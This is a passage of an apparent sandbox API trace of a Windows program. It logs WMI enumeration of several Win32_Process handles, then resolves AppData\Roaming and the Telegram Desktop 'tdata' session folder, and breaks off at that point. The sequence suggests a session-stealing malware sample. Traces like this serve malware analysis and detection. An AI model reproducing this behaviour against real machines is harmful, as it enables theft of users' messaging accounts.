Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.470] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.470] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.470] IUnknown:Release (This=0x601a94) returned 0x1 [0265.471] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.471] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.471] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5542120) returned 0x0 [0265.471] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542120, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5542120) returned 0x0 [0265.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542120, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542120, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.472] WbemDefPath:IUnknown:AddRef (This=0x5542120) returned 0x3 [0265.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542120, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542120, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542120, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5544330) returned 0x0 [0265.472] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5544330, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.472] WbemDefPath:IUnknown:Release (This=0x5544330) returned 0x3 [0265.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542120, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.472] WbemDefPath:IUnknown:Release (This=0x5542120) returned 0x2 [0265.472] WbemDefPath:IUnknown:Release (This=0x5542120) returned 0x1 [0265.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542120, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5542120) returned 0x0 [0265.472] WbemDefPath:IUnknown:AddRef (This=0x5542120) returned 0x3 [0265.472] WbemDefPath:IUnknown:Release (This=0x5542120) returned 0x2 [0265.472] WbemDefPath:IWbemPath:SetText (This=0x5542120, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4720\"") returned 0x0 [0265.473] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.473] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.473] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.473] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.473] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.473] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.473] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.473] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x553a600, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.474] IUnknown:AddRef (This=0x553a600) returned 0x3 [0265.474] IUnknown:QueryInterface (in: This=0x553a600, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.474] IUnknown:QueryInterface (in: This=0x553a600, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.474] IUnknown:QueryInterface (in: This=0x553a600, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x553a604) returned 0x0 [0265.474] IMarshal:GetUnmarshalClass (in: This=0x553a604, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.474] IUnknown:Release (This=0x553a604) returned 0x3 [0265.475] CoTaskMemFree (pv=0x54ba398) [0265.475] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.475] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.475] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.475] IUnknown:Release (This=0x601a94) returned 0x1 [0265.476] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba3b8) returned 0x0 [0265.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba3b8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.476] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba3b8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5542190) returned 0x0 [0265.476] WbemDefPath:IUnknown:Release (This=0x54ba3b8) returned 0x0 [0265.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542190, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5542190) returned 0x0 [0265.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542190, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542190, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.477] WbemDefPath:IUnknown:AddRef (This=0x5542190) returned 0x3 [0265.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542190, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542190, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542190, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5544450) returned 0x0 [0265.477] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5544450, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.477] WbemDefPath:IUnknown:Release (This=0x5544450) returned 0x3 [0265.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542190, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.477] WbemDefPath:IUnknown:Release (This=0x5542190) returned 0x2 [0265.477] WbemDefPath:IUnknown:Release (This=0x5542190) returned 0x1 [0265.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542190, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5542190) returned 0x0 [0265.477] WbemDefPath:IUnknown:AddRef (This=0x5542190) returned 0x3 [0265.477] WbemDefPath:IUnknown:Release (This=0x5542190) returned 0x2 [0265.477] WbemDefPath:IWbemPath:SetText (This=0x5542190, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2504\"") returned 0x0 [0265.477] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.477] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.478] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.478] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.478] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.478] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.478] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.478] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x5539610, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.479] IUnknown:AddRef (This=0x5539610) returned 0x3 [0265.479] IUnknown:QueryInterface (in: This=0x5539610, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.479] IUnknown:QueryInterface (in: This=0x5539610, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.479] IUnknown:QueryInterface (in: This=0x5539610, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5539614) returned 0x0 [0265.479] IMarshal:GetUnmarshalClass (in: This=0x5539614, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.479] IUnknown:Release (This=0x5539614) returned 0x3 [0265.479] CoTaskMemFree (pv=0x54ba398) [0265.479] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.480] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.480] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.480] IUnknown:Release (This=0x601a94) returned 0x1 [0265.480] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.481] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.481] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x55422e0) returned 0x0 [0265.481] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.481] WbemDefPath:IUnknown:QueryInterface (in: This=0x55422e0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x55422e0) returned 0x0 [0265.481] WbemDefPath:IUnknown:QueryInterface (in: This=0x55422e0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.481] WbemDefPath:IUnknown:QueryInterface (in: This=0x55422e0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.481] WbemDefPath:IUnknown:AddRef (This=0x55422e0) returned 0x3 [0265.481] WbemDefPath:IUnknown:QueryInterface (in: This=0x55422e0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.481] WbemDefPath:IUnknown:QueryInterface (in: This=0x55422e0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.481] WbemDefPath:IUnknown:QueryInterface (in: This=0x55422e0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x55443d8) returned 0x0 [0265.481] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55443d8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.481] WbemDefPath:IUnknown:Release (This=0x55443d8) returned 0x3 [0265.481] WbemDefPath:IUnknown:QueryInterface (in: This=0x55422e0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.481] WbemDefPath:IUnknown:Release (This=0x55422e0) returned 0x2 [0265.481] WbemDefPath:IUnknown:Release (This=0x55422e0) returned 0x1 [0265.481] WbemDefPath:IUnknown:QueryInterface (in: This=0x55422e0, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x55422e0) returned 0x0 [0265.482] WbemDefPath:IUnknown:AddRef (This=0x55422e0) returned 0x3 [0265.482] WbemDefPath:IUnknown:Release (This=0x55422e0) returned 0x2 [0265.482] WbemDefPath:IWbemPath:SetText (This=0x55422e0, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"5072\"") returned 0x0 [0265.482] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.482] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.482] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.482] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.482] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.482] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.482] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.482] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x0, puReturned=0x23c1fd0*=0x0) returned 0x1 [0265.483] CoTaskMemFree (pv=0x54ba2d8) [0265.483] WbemLocator:IUnknown:Release (This=0x66f270) returned 0x1 [0265.483] IUnknown:Release (This=0x663848) returned 0x0 [0265.485] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x1 [0265.485] IUnknown:Release (This=0x663780) returned 0x0 [0265.488] CoTaskMemAlloc (cb=0x20c) returned 0x676ce0 [0265.488] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x676ce0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0265.488] CoTaskMemFree (pv=0x676ce0) [0265.489] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0265.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f25c) returned 1 [0265.489] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\tdata", nBufferLength=0x105, 